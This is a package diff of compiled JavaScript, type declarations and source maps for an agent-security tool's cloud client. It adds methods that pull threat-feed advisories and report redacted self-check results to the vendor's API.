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"}
|
package/dist/cloud/client.d.ts
CHANGED
|
@@ -1,5 +1,6 @@
|
|
|
1
1
|
import type { AgentGuardConfig } from '../config.js';
|
|
2
2
|
import type { EffectiveRuntimePolicy, RuntimeAction, RuntimeAuditEvent, RuntimeDecision } from '../runtime/types.js';
|
|
3
|
+
import type { Advisory, SelfCheckMatch } from '../feed/types.js';
|
|
3
4
|
export declare class AgentGuardCloudClient {
|
|
4
5
|
private readonly cloudUrl;
|
|
5
6
|
private readonly apiKey?;
|
|
@@ -13,7 +14,28 @@ export declare class AgentGuardCloudClient {
|
|
|
13
14
|
evaluateAction(action: RuntimeAction): Promise<RuntimeDecision>;
|
|
14
15
|
ingestEvents(events: RuntimeAuditEvent[]): Promise<void>;
|
|
15
16
|
createApproval(event: RuntimeAuditEvent): Promise<string | null>;
|
|
17
|
+
/**
|
|
18
|
+
* Pull threat-feed advisories newer than `since`. Returns null when the
|
|
19
|
+
* cloud doesn't expose the endpoint yet (404) — callers should treat null
|
|
20
|
+
* as "no new advisories" rather than an error, so the subscribe command
|
|
21
|
+
* works against older AgentGuard Cloud versions too.
|
|
22
|
+
*/
|
|
23
|
+
pullAdvisories(since?: string): Promise<Advisory[] | null>;
|
|
24
|
+
/**
|
|
25
|
+
* Report the outcome of a single advisory self-check. Matches paths are
|
|
26
|
+
* redacted by the caller before they get here. Tolerates 404 so subscribe
|
|
27
|
+
* still completes locally even if the report sink is absent server-side.
|
|
28
|
+
*/
|
|
29
|
+
reportSelfCheck(advisoryId: string, matches: SelfCheckMatch[], options?: {
|
|
30
|
+
elapsedMs?: number;
|
|
31
|
+
warnings?: string[];
|
|
32
|
+
}): Promise<void>;
|
|
16
33
|
private request;
|
|
17
34
|
private requireApiKey;
|
|
18
35
|
}
|
|
36
|
+
export declare class CloudRequestError extends Error {
|
|
37
|
+
readonly status: number;
|
|
38
|
+
readonly path: string;
|
|
39
|
+
constructor(status: number, path: string);
|
|
40
|
+
}
|
|
19
41
|
//# sourceMappingURL=client.d.ts.map
|
|
@@ -1 +1 @@
|
|
|
1
|
-
{"version":3,"file":"client.d.ts","sourceRoot":"","sources":["../../src/cloud/client.ts"],"names":[],"mappings":"AACA,OAAO,KAAK,EAAE,gBAAgB,EAAE,MAAM,cAAc,CAAC;AACrD,OAAO,KAAK,EACV,sBAAsB,EACtB,aAAa,EACb,iBAAiB,EACjB,eAAe,EAChB,MAAM,qBAAqB,CAAC;
|
|
1
|
+
{"version":3,"file":"client.d.ts","sourceRoot":"","sources":["../../src/cloud/client.ts"],"names":[],"mappings":"AACA,OAAO,KAAK,EAAE,gBAAgB,EAAE,MAAM,cAAc,CAAC;AACrD,OAAO,KAAK,EACV,sBAAsB,EACtB,aAAa,EACb,iBAAiB,EACjB,eAAe,EAChB,MAAM,qBAAqB,CAAC;AAG7B,OAAO,KAAK,EAAE,QAAQ,EAAE,cAAc,EAAE,MAAM,kBAAkB,CAAC;AAOjE,qBAAa,qBAAqB;IAChC,OAAO,CAAC,QAAQ,CAAC,QAAQ,CAAS;IAClC,OAAO,CAAC,QAAQ,CAAC,MAAM,CAAC,CAAS;gBAErB,MAAM,EAAE,IAAI,CAAC,gBAAgB,EAAE,UAAU,GAAG,QAAQ,CAAC;IAKjE,IAAI,SAAS,IAAI,OAAO,CAEvB;IAEK,MAAM,IAAI,OAAO,CAAC;QAAE,MAAM,EAAE,MAAM,CAAC;QAAC,OAAO,CAAC,EAAE,MAAM,CAAA;KAAE,CAAC;IAKvD,oBAAoB,IAAI,OAAO,CAAC,sBAAsB,CAAC;IAMvD,cAAc,CAAC,MAAM,EAAE,aAAa,GAAG,OAAO,CAAC,eAAe,CAAC;IAS/D,YAAY,CAAC,MAAM,EAAE,iBAAiB,EAAE,GAAG,OAAO,CAAC,IAAI,CAAC;IAUxD,cAAc,CAAC,KAAK,EAAE,iBAAiB,GAAG,OAAO,CAAC,MAAM,GAAG,IAAI,CAAC;IAStE;;;;;OAKG;IACG,cAAc,CAAC,KAAK,CAAC,EAAE,MAAM,GAAG,OAAO,CAAC,QAAQ,EAAE,GAAG,IAAI,CAAC;IAgBhE;;;;OAIG;IACG,eAAe,CACnB,UAAU,EAAE,MAAM,EAClB,OAAO,EAAE,cAAc,EAAE,EACzB,OAAO,GAAE;QAAE,SAAS,CAAC,EAAE,MAAM,CAAC;QAAC,QAAQ,CAAC,EAAE,MAAM,EAAE,CAAA;KAAO,GACxD,OAAO,CAAC,IAAI,CAAC;YAoBF,OAAO;IAiBrB,OAAO,CAAC,aAAa;CAKtB;AAED,qBAAa,iBAAkB,SAAQ,KAAK;aAExB,MAAM,EAAE,MAAM;aACd,IAAI,EAAE,MAAM;gBADZ,MAAM,EAAE,MAAM,EACd,IAAI,EAAE,MAAM;CAK/B"}
|
package/dist/cloud/client.js
CHANGED
|
@@ -1,6 +1,6 @@
|
|
|
1
1
|
"use strict";
|
|
2
2
|
Object.defineProperty(exports, "__esModule", { value: true });
|
|
3
|
-
exports.AgentGuardCloudClient = void 0;
|
|
3
|
+
exports.CloudRequestError = exports.AgentGuardCloudClient = void 0;
|
|
4
4
|
const config_js_1 = require("../config.js");
|
|
5
5
|
const redaction_js_1 = require("../runtime/redaction.js");
|
|
6
6
|
const audit_js_1 = require("../runtime/audit.js");
|
|
@@ -48,6 +48,54 @@ class AgentGuardCloudClient {
|
|
|
48
48
|
});
|
|
49
49
|
return body.data.approvalId || null;
|
|
50
50
|
}
|
|
51
|
+
/**
|
|
52
|
+
* Pull threat-feed advisories newer than `since`. Returns null when the
|
|
53
|
+
* cloud doesn't expose the endpoint yet (404) — callers should treat null
|
|
54
|
+
* as "no new advisories" rather than an error, so the subscribe command
|
|
55
|
+
* works against older AgentGuard Cloud versions too.
|
|
56
|
+
*/
|
|
57
|
+
async pullAdvisories(since) {
|
|
58
|
+
const params = new URLSearchParams();
|
|
59
|
+
if (since)
|
|
60
|
+
params.set('since', since);
|
|
61
|
+
const qs = params.toString();
|
|
62
|
+
const path = `/api/v1/feed/advisories${qs ? `?${qs}` : ''}`;
|
|
63
|
+
try {
|
|
64
|
+
const body = await this.request(path);
|
|
65
|
+
return body.data.advisories ?? [];
|
|
66
|
+
}
|
|
67
|
+
catch (err) {
|
|
68
|
+
if (err instanceof CloudRequestError && err.status === 404) {
|
|
69
|
+
return null;
|
|
70
|
+
}
|
|
71
|
+
throw err;
|
|
72
|
+
}
|
|
73
|
+
}
|
|
74
|
+
/**
|
|
75
|
+
* Report the outcome of a single advisory self-check. Matches paths are
|
|
76
|
+
* redacted by the caller before they get here. Tolerates 404 so subscribe
|
|
77
|
+
* still completes locally even if the report sink is absent server-side.
|
|
78
|
+
*/
|
|
79
|
+
async reportSelfCheck(advisoryId, matches, options = {}) {
|
|
80
|
+
this.requireApiKey();
|
|
81
|
+
try {
|
|
82
|
+
await this.request('/api/v1/feed/self-check-report', {
|
|
83
|
+
method: 'POST',
|
|
84
|
+
body: JSON.stringify({
|
|
85
|
+
advisoryId,
|
|
86
|
+
matches,
|
|
87
|
+
elapsedMs: options.elapsedMs,
|
|
88
|
+
warnings: options.warnings,
|
|
89
|
+
}),
|
|
90
|
+
});
|
|
91
|
+
}
|
|
92
|
+
catch (err) {
|
|
93
|
+
if (err instanceof CloudRequestError && err.status === 404) {
|
|
94
|
+
return;
|
|
95
|
+
}
|
|
96
|
+
throw err;
|
|
97
|
+
}
|
|
98
|
+
}
|
|
51
99
|
async request(path, init = {}) {
|
|
52
100
|
const response = await fetch(`${this.cloudUrl}${path}`, {
|
|
53
101
|
...init,
|
|
@@ -60,7 +108,7 @@ class AgentGuardCloudClient {
|
|
|
60
108
|
});
|
|
61
109
|
const body = (await response.json().catch(() => null));
|
|
62
110
|
if (!response.ok || !body?.success) {
|
|
63
|
-
throw new
|
|
111
|
+
throw new CloudRequestError(response.status, path);
|
|
64
112
|
}
|
|
65
113
|
return body;
|
|
66
114
|
}
|
|
@@ -71,6 +119,17 @@ class AgentGuardCloudClient {
|
|
|
71
119
|
}
|
|
72
120
|
}
|
|
73
121
|
exports.AgentGuardCloudClient = AgentGuardCloudClient;
|
|
122
|
+
class CloudRequestError extends Error {
|
|
123
|
+
status;
|
|
124
|
+
path;
|
|
125
|
+
constructor(status, path) {
|
|
126
|
+
super(`AgentGuard Cloud request failed: ${status} (${path})`);
|
|
127
|
+
this.status = status;
|
|
128
|
+
this.path = path;
|
|
129
|
+
this.name = 'CloudRequestError';
|
|
130
|
+
}
|
|
131
|
+
}
|
|
132
|
+
exports.CloudRequestError = CloudRequestError;
|
|
74
133
|
function sanitizeActionRequest(action) {
|
|
75
134
|
return {
|
|
76
135
|
sessionId: (0, redaction_js_1.redactPreview)(action.sessionId, 160),
|
package/dist/cloud/client.js.map
CHANGED
|
@@ -1 +1 @@
|
|
|
1
|
-
{"version":3,"file":"client.js","sourceRoot":"","sources":["../../src/cloud/client.ts"],"names":[],"mappings":";;;AAAA,4CAAiD;AAQjD,0DAAwE;AACxE,kDAAsD;
|
|
1
|
+
{"version":3,"file":"client.js","sourceRoot":"","sources":["../../src/cloud/client.ts"],"names":[],"mappings":";;;AAAA,4CAAiD;AAQjD,0DAAwE;AACxE,kDAAsD;AAQtD,MAAa,qBAAqB;IACf,QAAQ,CAAS;IACjB,MAAM,CAAU;IAEjC,YAAY,MAAqD;QAC/D,IAAI,CAAC,QAAQ,GAAG,IAAA,6BAAiB,EAAC,MAAM,CAAC,QAAQ,IAAI,kCAAkC,CAAC,CAAC;QACzF,IAAI,CAAC,MAAM,GAAG,MAAM,CAAC,MAAM,CAAC;IAC9B,CAAC;IAED,IAAI,SAAS;QACX,OAAO,OAAO,CAAC,IAAI,CAAC,MAAM,CAAC,CAAC;IAC9B,CAAC;IAED,KAAK,CAAC,MAAM;QACV,MAAM,IAAI,GAAG,MAAM,IAAI,CAAC,OAAO,CAAuC,gBAAgB,CAAC,CAAC;QACxF,OAAO,IAAI,CAAC,IAAI,CAAC;IACnB,CAAC;IAED,KAAK,CAAC,oBAAoB;QACxB,IAAI,CAAC,aAAa,EAAE,CAAC;QACrB,MAAM,IAAI,GAAG,MAAM,IAAI,CAAC,OAAO,CAAyB,4BAA4B,CAAC,CAAC;QACtF,OAAO,IAAI,CAAC,IAAI,CAAC;IACnB,CAAC;IAED,KAAK,CAAC,cAAc,CAAC,MAAqB;QACxC,IAAI,CAAC,aAAa,EAAE,CAAC;QACrB,MAAM,IAAI,GAAG,MAAM,IAAI,CAAC,OAAO,CAAkB,0BAA0B,EAAE;YAC3E,MAAM,EAAE,MAAM;YACd,IAAI,EAAE,IAAI,CAAC,SAAS,CAAC,qBAAqB,CAAC,MAAM,CAAC,CAAC;SACpD,CAAC,CAAC;QACH,OAAO,IAAI,CAAC,IAAI,CAAC;IACnB,CAAC;IAED,KAAK,CAAC,YAAY,CAAC,MAA2B;QAC5C,IAAI,CAAC,aAAa,EAAE,CAAC;QACrB,MAAM,IAAI,CAAC,OAAO,CAAC,uBAAuB,EAAE;YAC1C,MAAM,EAAE,MAAM;YACd,IAAI,EAAE,IAAI,CAAC,SAAS,CAAC;gBACnB,MAAM,EAAE,MAAM,CAAC,GAAG,CAAC,CAAC,KAAK,EAAE,EAAE,CAAC,IAAA,0BAAe,EAAC,KAAK,CAAC,CAAC;aACtD,CAAC;SACH,CAAC,CAAC;IACL,CAAC;IAED,KAAK,CAAC,cAAc,CAAC,KAAwB;QAC3C,IAAI,CAAC,aAAa,EAAE,CAAC;QACrB,MAAM,IAAI,GAAG,MAAM,IAAI,CAAC,OAAO,CAAyB,